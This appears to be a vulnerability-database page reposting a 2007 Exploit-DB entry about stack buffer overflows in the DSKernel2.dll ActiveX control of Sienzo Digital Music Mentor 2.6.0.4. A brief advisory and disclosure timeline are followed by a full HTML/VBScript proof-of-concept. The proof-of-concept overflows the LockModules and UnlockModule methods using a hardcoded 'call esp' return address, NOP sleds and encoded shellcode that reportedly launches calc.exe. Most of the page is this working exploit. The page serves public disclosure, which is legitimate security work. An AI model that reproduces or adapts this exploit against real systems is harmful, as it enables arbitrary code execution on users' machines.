Sienzo Digital Music Mentor - 'DSKernel2.dll' ActiveX Control Stack Buffer Overflow

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056237 漏洞类型
发布时间 2007-05-07 更新时间 2007-05-07
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/29952
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/23838/info

Sienzo Digital Music Mentor is prone to multiple stack-based buffer-overflow vulnerabilities because the software fails to adequately check boundaries on data supplied to multiple ActiveX control methods.

An attacker can exploit this issue to execute arbitrary code in the context of a user running the application. Failed attempts will likely result in denial-of-service conditions.

Digital Music Mentor 2.6.0.4 is vulnerable; other versions may also be affected.

<span style="font: 14pt Courier New;"><p align="center"><b>2007/05/06</b></p></span> <pre> <code><span style="font: 10pt Courier New;"><span class="general1-symbol">-------------------------------------------------------------------------------------------------------- Sienzo Digital Music Mentor (DMM) 2.6.0.4 (DSKernel2.dll) multiple method local Stack Overflow Exploit url: http://www.sienzo.com/ price: $59.95 author: shinnai mail: shinnai[at]autistici[dot]org site: http://shinnai.altervista.org Tested on Windows XP Professional SP2 full patched <b>DSKernel2.dll v. 1.0.0.57 is vulnerable to a stack overflow that allows arbitrary code execution.</b> <font color = red><b>This exploits just open calc.exe</b></font> Time Table: 2007/30/04 -> Bug discovered 2007/30/04 -> Vendor notified by mail 2007/02/05 -> Vendor asks for more details 2007/02/05 -> Copy of exploits send to Vendor 2007/03/05 -> No more responses from Vendor 2007/06/05 -> Public disclosure on MoAxB -------------------------------------------------------------------------------------------------------- <object classid='clsid:E2B7DDA9-38C5-11D5-91F6-00104BDB8FF9' id='test'></object> <input language=VBScript onclick=tryMe() type=button value="Click here to start the LockModules test" style="WIDTH: 350px; HEIGHT: 25px" size=20> <input language=VBScript onclick=tryMe2() type=button value="Click here to start the UnlockModule test" style="WIDTH: 350px; HEIGHT: 25px" size=20> <script language = 'vbscript'> Sub tryMe buff = String(263,"A") get_EIP = unescape("%EB%AA%D7%77") '0x77D7AAEB call esp (from user32.dll) nop = unescape("%90%90%90%90%90") shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _ unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _ unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _ unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _ unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _ unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _ unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _ unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _ unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _ unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _ unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _ unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _ unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _ unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _ unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _ unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _ unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _ unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _ unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _ unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _ unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _ unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a") egg = buff + get_EIP + nop + shellcode + nop test.LockModules egg, 1 End Sub Sub tryMe2 buff = String(296,"A") get_EIP = unescape("%EB%AA%D7%77") '0x77D7AAEB call esp (from user32.dll) nop = unescape("%90%90%90%90%90%90%90%90%90%90%90%90") shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _ unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _ unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _ unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _ unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _ unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _ unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _ unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _ unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _ unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _ unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _ unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _ unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _ unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _ unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _ unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _ unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _ unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _ unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _ unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _ unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _ unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a") egg = buff + get_EIP + nop + shellcode + nop test.UnlockModule egg, 1, "default" End Sub </script> </span> </code></pre>